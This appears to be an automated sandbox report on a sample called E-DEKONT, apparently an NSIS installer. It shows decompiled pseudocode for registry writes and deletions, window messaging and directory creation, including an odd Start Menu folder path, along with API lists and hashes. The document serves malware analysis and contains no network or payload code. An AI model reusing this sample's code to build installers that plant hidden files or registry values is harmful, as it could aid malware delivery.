                                                                            0x10001778
                                                                            0x10001786
                                                                            0x10001789
                                                                            0x1000178b
                                                                            0x10001790
                                                                            0x10001795
                                                                            0x100018a8
                                                                            0x100018a8
                                                                            0x1000179b
                                                                            0x1000179f
                                                                            0x100017a2
                                                                            0x100017a7
                                                                            0x100017a8
                                                                            0x100017a9
                                                                            0x100017af
                                                                            0x100017b5
                                                                            0x100017e5
                                                                            0x100017ec
                                                                            0x10001810
                                                                            0x1000184f
                                                                            0x10001812
                                                                            0x10001812
                                                                            0x10001813
                                                                            0x10001816
                                                                            0x1000181c
                                                                            0x10001820
                                                                            0x10001823
                                                                            0x10001828
                                                                            0x10001828
                                                                            0x1000182f
                                                                            0x10001835
                                                                            0x1000183b
                                                                            0x10001847
                                                                            0x10001848
                                                                            0x1000184b
                                                                            0x100017ee
                                                                            0x100017ef
                                                                            0x10001804
                                                                            0x10001804
                                                                            0x10001859
                                                                            0x1000185c
                                                                            0x10001869
                                                                            0x10001870
                                                                            0x10001878
                                                                            0x1000187b
                                                                            0x1000187b
                                                                            0x10001878
                                                                            0x10001888
                                                                            0x10001890
                                                                            0x10001895
                                                                            0x10001888
                                                                            0x1000189d
                                                                            0x00000000
                                                                            0x1000189f
                                                                            0x00000000
                                                                            0x100018a0
                                                                            0x1000189d
                                                                            0x100017b9
                                                                            0x100017bc
                                                                            0x100017da
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100017dd
                                                                            0x100017e2
                                                                            0x100017e2
                                                                            0x100017e4
                                                                            0x00000000
                                                                            0x100017e4
                                                                            0x100017be
                                                                            0x100017bf
                                                                            0x100017c7
                                                                            0x100017c8
                                                                            0x00000000
                                                                            0x100017c8
                                                                            0x100017c1
                                                                            0x100017c2
                                                                            0x100017d0
                                                                            0x00000000
                                                                            0x100017d0
                                                                            0x100017c5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100017c5

                                                                            APIs
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                              • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1791698881-3916222277
                                                                            • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                            • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                            • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                            • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004061C9();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                            0x00401c19
                                                                            0x00401c1b
                                                                            0x00401c22
                                                                            0x00401c25
                                                                            0x00401c28
                                                                            0x00401c32
                                                                            0x00401c36
                                                                            0x00401c39
                                                                            0x00401c42
                                                                            0x00401c42
                                                                            0x00401c45
                                                                            0x00401c49
                                                                            0x00401c52
                                                                            0x00401c52
                                                                            0x00401c55
                                                                            0x00401c59
                                                                            0x00401c5b
                                                                            0x00401cb0
                                                                            0x00401cb2
                                                                            0x00401cbd
                                                                            0x00401cc7
                                                                            0x00401cca
                                                                            0x00401cca
                                                                            0x00401cd3
                                                                            0x00000000
                                                                            0x00401c5d
                                                                            0x00401c64
                                                                            0x00401c66
                                                                            0x00401c69
                                                                            0x00401c6f
                                                                            0x00401c76
                                                                            0x00401c79
                                                                            0x00401ca1
                                                                            0x00401cd9
                                                                            0x00401cd9
                                                                            0x00401c7b
                                                                            0x00401c89
                                                                            0x00401c91
                                                                            0x00401c94
                                                                            0x00401c94
                                                                            0x00401c79
                                                                            0x00401cdc
                                                                            0x00401cdf
                                                                            0x00401ce5
                                                                            0x00402a65
                                                                            0x00402a65
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                            • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                                            • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                            • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 83%
                                                                            			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5d0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5d0 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}













                                                                            0x004023de
                                                                            0x004023de
                                                                            0x004023de
                                                                            0x004023e1
                                                                            0x004023e8
                                                                            0x004023f2
                                                                            0x004023f5
                                                                            0x004023fe
                                                                            0x00402405
                                                                            0x0040240c
                                                                            0x0040240f
                                                                            0x00402415
                                                                            0x0040241f
                                                                            0x00402423
                                                                            0x0040242e
                                                                            0x0040242e
                                                                            0x00402435
                                                                            0x0040243f
                                                                            0x00402445
                                                                            0x00402448
                                                                            0x00402448
                                                                            0x0040244c
                                                                            0x00402458
                                                                            0x00402458
                                                                            0x00402469
                                                                            0x00402471
                                                                            0x00402473
                                                                            0x00402473
                                                                            0x00402476
                                                                            0x00402551
                                                                            0x00402551
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000023,00000011,00000002), ref: 00402429
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402469
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402551
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp
                                                                            • API String ID: 2655323295-2936999414
                                                                            • Opcode ID: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
                                                                            • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                                            • Opcode Fuzzy Hash: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
                                                                            • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 84%
                                                                            			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060EF(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E0040665C(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}











                                                                            0x00402d35
                                                                            0x00402d3e
                                                                            0x00402d47
                                                                            0x00402d53
                                                                            0x00402d5a
                                                                            0x00402d7e
                                                                            0x00402d64
                                                                            0x00402d66
                                                                            0x00402db9
                                                                            0x00000000
                                                                            0x00402dc1
                                                                            0x00402d75
                                                                            0x00402d7a
                                                                            0x00402d7c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402d7c
                                                                            0x00402d98
                                                                            0x00402da0
                                                                            0x00402da7
                                                                            0x00000000
                                                                            0x00402dca
                                                                            0x00000000
                                                                            0x00402db2
                                                                            0x00402dd4

                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Close$Enum
                                                                            • String ID:
                                                                            • API String ID: 464197530-0
                                                                            • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                            • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                                            • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                            • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BFE(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B80(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405832( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040584F(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E004057B5( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                            0x004015c1
                                                                            0x004015c9
                                                                            0x004015cc
                                                                            0x004015d1
                                                                            0x004015d5
                                                                            0x004015d7
                                                                            0x004015df
                                                                            0x004015e1
                                                                            0x004015e4
                                                                            0x004015ea
                                                                            0x00401604
                                                                            0x00401607
                                                                            0x004015ec
                                                                            0x004015ec
                                                                            0x004015ef
                                                                            0x00000000
                                                                            0x004015fa
                                                                            0x004015fd
                                                                            0x004015fd
                                                                            0x004015ef
                                                                            0x0040160e
                                                                            0x00401615
                                                                            0x00401624
                                                                            0x00401624
                                                                            0x00401617
                                                                            0x0040161a
                                                                            0x00401622
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401622
                                                                            0x00401615
                                                                            0x00401627
                                                                            0x0040162b
                                                                            0x0040162c
                                                                            0x004015d7
                                                                            0x00401634
                                                                            0x00401663
                                                                            0x00402245
                                                                            0x00401636
                                                                            0x00401638
                                                                            0x00401645
                                                                            0x0040164d
                                                                            0x00401655
                                                                            0x0040165b
                                                                            0x0040165b
                                                                            0x00401655
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405C0C
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede,?,00000000,000000F0), ref: 0040164D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede, xrefs: 00401640
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede
                                                                            • API String ID: 1892508949-935500906
                                                                            • Opcode ID: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
                                                                            • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                            • Opcode Fuzzy Hash: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
                                                                            • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405C5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E00405C5B(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406282(0x42fa50, _a4);
				_t21 = E00405BFE(0x42fa50);
				if(_t21 != 0) {
					E00406516(_t21);
					if(( *0x434efc & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa50);
							_push(0x42fa50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065C5();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B9F(0x42fa50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B53();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                            0x00405c67
                                                                            0x00405c72
                                                                            0x00405c76
                                                                            0x00405c7d
                                                                            0x00405c89
                                                                            0x00405c99
                                                                            0x00405c9b
                                                                            0x00405cb3
                                                                            0x00405cb4
                                                                            0x00405cbb
                                                                            0x00405cbc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c9f
                                                                            0x00405ca6
                                                                            0x00405cae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ca6
                                                                            0x00405cbe
                                                                            0x00405cc4
                                                                            0x00000000
                                                                            0x00405cd2
                                                                            0x00405c8b
                                                                            0x00405c91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c91
                                                                            0x00405c78
                                                                            0x00000000

                                                                            APIs
                                                                              • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405C0C
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                            • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405CB4
                                                                            • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420), ref: 00405CC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
